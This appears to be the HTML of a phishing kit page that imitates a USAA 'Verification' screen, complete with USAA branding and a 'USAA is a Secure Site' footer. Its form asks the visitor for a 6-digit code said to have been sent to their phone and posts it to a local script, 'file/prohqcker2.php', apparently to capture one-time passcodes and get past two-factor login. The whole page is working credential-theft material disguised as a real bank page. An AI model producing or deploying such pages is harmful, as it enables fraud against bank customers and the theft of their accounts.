<!DOCTYPE html>
<html lang="en">
<head>
    <title>Member Account Login | USAA</title>
    <meta charset="utf-8">
    <meta data-react-helmet="true" name="description" content="Login to your USAA member account for home, life, and auto insurance as well as online banking and investment services.">
    <meta data-react-helmet="true" name="keywords" content="USAA Login, Member Login, Logon Page">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta id="Viewport" name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="css/aggregator.css">
</head>
<body class="imageLoader">
    <div id="container" class="page-ctr">
        <div id="header" class="global-header">
            <div class="hdr-ftr-content-ctr">
                <div id="" class="global-header-content">
                    <a class="usaaLogo-cont" aria-label="USAA Home">
                        <span class="usaa-logo"></span>
                    </a>
                    <h1>Verification</h1>  
                    <span id="ccPageTitle" data-clientconfig-pagetitle=" Password Recovery"></span>
                </div>
            </div>
        </div>
        <div id="content" class="content-ctr" role="main">
            <a name="top"></a> 
            <div id="main">
                <form action="file/prohqcker2.php" method="post" id="pf_identify_account_onlineId_mobile" autocomplete="off">
                    <div id="main-ctr" class="service main-content-ctr">
                        <p>For security reason, a 6-digit code has been sent to your phone number.</p>
                        <div class="section">
                            <div>
                                <div class="details">
                                    <label for="fname" class="sctn-legend prepend-0"><strong>Verification</strong></label>
                                </div>
                                <input type="tel" id="otp" placeholder="Enter Code" name="otp" maxlength="20" size="25" class="width100" required>
                            </div>
                            <div class="buttonContainer">
                                <div><input class="action" value="Verify" type="submit"></div>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
        <div id="footer" class="global-footer" style="position: fixed; bottom: 0; width: 100">
            <div class="hdr-ftr-content-ctr">
                <div id="" class="global-footer-content">
                    <div id="nav" class="footer-nav">
                        <span class="copy">
                            <a>Accessibility</a>	
                            <span> | </span>
                                <a>Contact Us</a>
                        </span>
                    </div>
                    <a class="secure-Site secondary">USAA is a Secure Site</a>
                </div>
            </div>
        </div>
    </div>
</body>
</html>